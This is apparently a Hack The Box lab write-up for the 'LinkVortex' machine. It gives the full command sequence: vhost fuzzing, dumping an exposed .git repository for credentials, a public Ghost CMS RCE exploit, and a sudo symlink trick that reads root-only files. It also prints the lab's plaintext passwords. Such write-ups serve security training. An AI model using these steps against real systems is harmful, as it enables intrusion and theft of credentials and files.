LinkVortex (HTB – Easy)

The machine hosts a Ghost CMS instance on the main domain and a development subdomain exposing a full .git repository. Dumping the repository reveals credentials for the Ghost admin panel. A public Ghost CMS vulnerability (CVE‑2023‑40028) provides RCE. Privilege escalation is achieved through a symlink abuse in a sudo‑controlled cleanup script.

Overview

Target: linkvortex.htb
Initial vector: exposed .git directory → credential leak
Privilege escalation: insecure symlink handling in sudo script

Enumeration

Robots.txt:

/p/
/r/
/email/
/sitemap/

Wappalyzer and WhatWeb identify the CMS:

Ghost CMS 5.58

Directory fuzzing on the main domain reveals nothing useful.

Subdomain Discovery

Fuzz virtual hosts:

$ ffuf -u http://linkvortex.htb/ -H "Host: FUZZ.linkvortex.htb" \
  -w /usr/share/wordlists/dirb/common.txt -fc 301
-> dev.linkvortex.htb

Fuzzing the dev subdomain:

$ ffuf -u http://dev.linkvortex.htb/FUZZ \
  -w /usr/share/wordlists/dirb/common.txt -fc 301
-> .git/HEAD (200)

The .git directory is fully exposed.

Dumping the Git Repository

Using git-dumper:

$ python3 git_dumper.py http://dev.linkvortex.htb ./GIT-DUMPER

Search for credentials:

$ grep -r "password" .
-> OctopiFociPilfer45

Try logging into Ghost admin:

http://linkvortex.htb/ghost
user: admin@linkvortex.htb
pass: OctopiFociPilfer45

Ghost CMS RCE (CVE‑2023‑40028)

Use the public exploit:

https://github.com/0xyassine/CVE-2023-40028

Run it:

$ ./exploit.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
-> RCE shell

From the shell, inspect the Ghost configuration:

/var/lib/ghost/config.production.json

Credentials found inside:

"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"

SSH as bob:

$ ssh bob@linkvortex.htb

Privilege Escalation

Check sudo permissions:

$ sudo -l
-> allowed to run /opt/ghost/clean_symlink.sh with CHECK_CONTENT=true

The script follows symlinks and reads files, allowing arbitrary file read as root.

Exploit:

$ ln -s /root/root.txt /home/bob/f1.txt
$ ln -s /home/bob/f1.txt /home/bob/f1.png
$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/f1.png

The script prints the contents of /root/root.txt.

Notes

The machine is intentionally brittle:

• Git dumpers may miss files unless using the right tool.
• The symlink exploit only works in /home/bob, not /tmp or /dev/shm.
• You must know the flag filename (root.txt) to retrieve it.

Conclusion

LinkVortex relies on an exposed .git directory to leak admin credentials, followed by Ghost CMS RCE and a symlink‑based privilege escalation. Once the cleanup script is abused, full system compromise is achieved.